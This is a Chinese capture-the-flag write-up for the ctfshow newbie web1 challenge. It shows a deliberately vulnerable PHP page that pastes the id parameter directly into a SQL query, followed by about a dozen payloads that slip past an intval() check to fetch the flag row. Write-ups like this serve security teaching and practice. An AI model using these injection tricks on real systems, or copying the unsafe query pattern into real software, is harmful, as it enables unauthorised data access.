【CTFWP】ctfshow-萌新-web1-7

文章目录


题目介绍

ctfshow-萌新计划-web1-web7

php+HTML 复制代码
<html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
    $id = $_GET['id'];
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

题目分析

  • 执行的sql为:select * from article where id = 1 order by id limit 1

  • 当id等于1000时,输出flag。

  • 但是get提交的参数id 大于 999 直接退出并返回错误

  • id 小于 999 拼接sql语句,并执行

payload

?id=2*500

?id=500/0.5

?id=round(999.9)

?id=power(10,3)

?id='1000%'

?id=!!1000

?id=0x3E8

?id=/**/1000

?id=~~1000

?id=0000|1000

?id=0000%5E1000

?id='1000'

?id=0b1111101000

......

本地测评代码

php 复制代码
<?php
if(isset($_GET['id'])){
    $id = $_GET['id'];
    if(intval($id) > 999){
        echo "大于999,$id<br>";
        $a = intval($id);
        echo "大于999,$a<br>";
        die("id error");
    }else{
        echo "小于999,$id<br>";
        $a = intval($id);
        echo "小于999,$a<br>";
    }
}else{
    highlight_file(__FILE__);
}
?>

此后如竟没有炬火,我便是唯一的光。

相关推荐
用户962377954485 小时前
DVWA 靶场实验报告 (High Level)
安全
阿里云大数据AI技术5 小时前
用 SQL 调大模型?Hologres + 百炼,让数据开发直接“对话”AI
sql·llm
数据智能老司机8 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机8 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954489 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star9 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户9623779544813 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行5 天前
网络安全总结
安全·web安全
red1giant_star5 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全